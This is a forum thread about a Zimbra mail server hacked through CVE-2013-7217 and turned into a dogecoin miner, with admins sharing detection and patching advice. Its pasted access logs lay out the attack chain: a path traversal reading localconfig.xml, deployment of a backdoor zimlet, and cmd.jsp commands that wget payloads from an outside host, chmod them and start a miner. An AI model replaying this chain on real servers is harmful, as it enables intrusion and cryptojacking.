zimbra 0-day

[mathx2]

So a customer box has a rogue coin miner running on it (mining dogecoin, of all things) under the Zimbra user. I assume this is due to this CVE-2013-7217 0-day exploit.
I assume once the exploit has been launched, that abitrary code execution is possible. However, they didnt run it as root, but as zimbra user, suggesting they didnt root the box (though that's just one local racecondition exploit away, right?)
Until I can reinstall the server from scratch (what everyone wants to do over the holidays after paying for an expensive piece of software, amirite?), if the machine is already exploited at the zimbra user level, what is the work around? Firewalled off the admin port already, dont think I can move off port 80 for them (without impacting production). Is the zimbra user password compromised? (I dont see ssh logins, for eg, but who knows). Are they going through login(1) either through ssh or otherwise? (Can we safely change the zimbra password? or the shell? I bet not, many crontab bits probably required it, though SHELL= could be set).
Suggestions welcome. (Usually I post under mathx but I cant recover my password - Zimbra doesnt seem to have their mailservers anti-spam compliant, and their helo doesnt reverse - which is kinda ridiculous for a mail server software company, ya?)

[9235Hien]

[quote user="mathx2"]So a customer box has a rogue coin miner running on it (mining dogecoin, of all things) under the Zimbra user. I assume this is due to this CVE-2013-7217 0-day exploit.
I assume once the exploit has been launched, that abitrary code execution is possible. However, they didnt run it as root, but as zimbra user, suggesting they didnt root the box (though that's just one local racecondition exploit away, right?)
Until I can reinstall the server from scratch (what everyone wants to do over the holidays after paying for an expensive piece of software, amirite?), if the machine is already exploited at the zimbra user level, what is the work around? Firewalled off the admin port already, dont think I can move off port 80 for them (without impacting production). Is the zimbra user password compromised? (I dont see ssh logins, for eg, but who knows). Are they going through login(1) either through ssh or otherwise? (Can we safely change the zimbra password? or the shell? I bet not, many crontab bits probably required it, though SHELL= could be set).
Suggestions welcome. (Usually I post under mathx but I cant recover my password - Zimbra doesnt seem to have their mailservers anti-spam compliant, and their helo doesnt reverse - which is kinda ridiculous for a mail server software company, ya?)[/QUOTE]
Hello,
Attacker can deploy malicious zimlets . Please check your deployed zimlets in /opt/zimbra/zimlets-deployed/ carefully.
For example: find /opt/zimbra/zimlets-deployed/ -type f -name "*.jsp" -exec grep "Runtime.getRuntime().exec" {} ;
Also please check logs at /opt/zimbra/log , you will get similar log if you got attacked by this exploit:
access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:08 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 3

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:10 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 6

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:11 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 20

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:13 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 6

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:14 +0000] "POST /service/admin/soap HTTP/1.1" 200 20677 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 5

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:18 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 4

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:22 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 255 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 71

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:25 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 257 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2


HTH.

[ljramos]

I have the same issue. is there a patch/fix for version 6.0_16

[mathx2]

[quote user="9235Hien"]Hello,
Attacker can deploy malicious zimlets . Please check your deployed zimlets in /opt/zimbra/zimlets-deployed/ carefully.
For example: find /opt/zimbra/zimlets-deployed/ -type f -name "*.jsp" -exec grep "Runtime.getRuntime().exec" {} ;
Also please check logs at /opt/zimbra/log , you will get similar log if you got attacked by this exploit:
access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:08 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 3

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:10 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 6

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:11 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 20

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:13 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 6

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:14 +0000] "POST /service/admin/soap HTTP/1.1" 200 20677 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 5

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:18 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 4

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:22 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 255 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 71

access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:25 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 257 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2


HTH.[/QUOTE]
it does help, looks like this is the case (see logs at bottom of post)

AND its the same IP as yours (!!).
meanwhile, i see nothing new or otherwise in /opt/zimbra/zimlets, so theyve managed run code locally through some other action. This would suggest that the hole is WORSE than described. Isnt just people reading mail and changing passwords, but with the ability to run local code as well. Isnt quite a remote root exploit, but that's academic with any racecondition toolkit.
Can we get a reply from a zimbra employee up in here?
Yeah you can see it clearly, they wget and install meep.pl then chmod it and it eventually runs. Pretty clever.
patched the server with the .tgz but Im thinking I need to reinstall entirely to be safe >:( not a good xmas present!

179.43.141.149 - - [28/Dec/2013:20:51:34 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 4

179.43.141.149 - - [28/Dec/2013:20:51:35 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1284 "-" "Mozilla/5.0 (X11; Li

nux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2

179.43.141.149 - - [28/Dec/2013:20:51:35 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Sa

fari/537.36" 13

179.43.141.149 - - [28/Dec/2013:20:51:36 +0000] "POST /service/admin/soap HTTP/1.1" 200 40514 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57

Safari/537.36" 166

179.43.141.149 - - [28/Dec/2013:20:51:39 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari

/537.36" 8

179.43.141.149 - - [28/Dec/2013:20:51:41 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 254 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ch

rome/31.0.1650.57 Safari/537.36" 89

179.43.141.149 - - [28/Dec/2013:20:51:44 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 256 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ch

rome/31.0.1650.57 Safari/537.36" 4

179.43.141.149 - - [28/Dec/2013:20:51:49 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 200 184 "-" "WWW-Mechanize/1.73" 2474

179.43.141.149 - - [28/Dec/2013:20:51:52 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 200 184 https://199.27.180.147/zimlet/com_zimbr ... jspaction/

cmd.jsp" "WWW-Mechanize/1.73" 4

179.43.141.149 - - [28/Dec/2013:20:51:52 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fmeep.pl HT

TP/1.1" 200 255 https://199.27.180.147/zimlet/com_zimbr ... on/cmd.jsp" "WWW-Mechanize/1.73" 1045

179.43.141.149 - - [28/Dec/2013:20:51:54 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa HTTP/1.1" 2

00 246 https://199.27.180.147/zimlet/com_zimbr ... %2Fmeep.pl" "WWW-Mechanize/1.73" 890

179.43.141.149 - - [28/Dec/2013:20:51:55 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb HTTP/1.1" 2

00 246 https://199.27.180.147/zimlet/com_zimbr ... %2Ftmp%2Fa" "WWW-Mechanize/1.73" 1355

179.43.141.149 - - [28/Dec/2013:20:51:57 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 228 https://199.

27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 24

179.43.141.149 - - [28/Dec/2013:20:51:58 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=%2Fvar%2Ftmp%2Fa%20-B%20-o%20stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A53%20

-u%20ilovebigdongs.1%20-p%20x%0A HTTP/1.1" 500 8498 https://199.27.180.147/zimlet/com_zimbr ... %2Ftmp%2Fb" "WWW-Mecha

nize/1.73" 15

179.43.141.149 - - [28/Dec/2013:20:52:09 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=%2Fvar%2Ftmp%2Fa%20-B%20-o%20stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334%20-u%20ilovebigdongs.1%20-p%20x HTTP/1.1" 500 8498 https://199.27.180.147/zimlet/com_zimbr ... %2Ftmp%2Fb" "WWW-Mechanize/1.73" 13

[mathx2]

In case you all didnt clue in, and apparently no one did because my post is still there _AND_ no one has commented, but I've just inadvertently released the entire method of compromise right down to executing code from remote.
Dont know if you want to remove that post, that's up to you, though I believe in full disclosure to ensure people fix things.
You might need to get your zimbra outbound mailserver reverse DNS fixed however to be able to contact some of your customers. I didnt get the warning email because of it. (Funny to think that the exploit could be used to patch vulnerable servers too, in fact!)

[9235Hien]

Hello mathx2,
In your log, Attacker deployed new zimlet named "com_zimbra_example_simplejspaction" on your zimbra server as backdoor .Directtory need to be checked is "/opt/zimbra/zimlets-deployed/"
HTH.

[quanah]

The RDNS issue should be fixed at this point, thanks

[nrc]

[quote user="mathx2"]In case you all didnt clue in, and apparently no one did because my post is still there _AND_ no one has commented, but I've just inadvertently released the entire method of compromise right down to executing code from remote.[/QUOTE]
The initial compromise appears to be the same as the one originally reported and patched. Once that vulnerability is exploited and a privileged account is created there are all sorts of things they can do with that. In your case they deployed a Zimlet which allowed them to execute arbitrary code. As Hien pointed out the trojan Zimlet is com_zimbra_example_simplejspaction. You should check for that and also check for and remove the account that was created.
To address your earlier question, you don't need to move from port 80, you just need to update to the recommended versions to close the original vulnerability. 7.2.6 or 8.0.6 are strongly recommended since they close another as yet undisclosed vulnerability. See the two posts below for more info.
http://www.zimbra.com/forums/announceme ... ploit.html

http://www.zimbra.com/forums/announceme ... eases.html

[nrc]

[quote user="ljramos"]I have the same issue. is there a patch/fix for version 6.0_16[/QUOTE]
Zimbra 6 was end of life as of September (and end of support a year before that) so you'll have to upgrade to get a fix. You might be able to use the nginx work around noted in the security guidance post linked above as a stop-gap.

[mmessina]

Any one have an easy way to isolate the new users? My zimbra install that was compromised has several hundred accounts and while I sorted by most recent I was unable to find the offending account.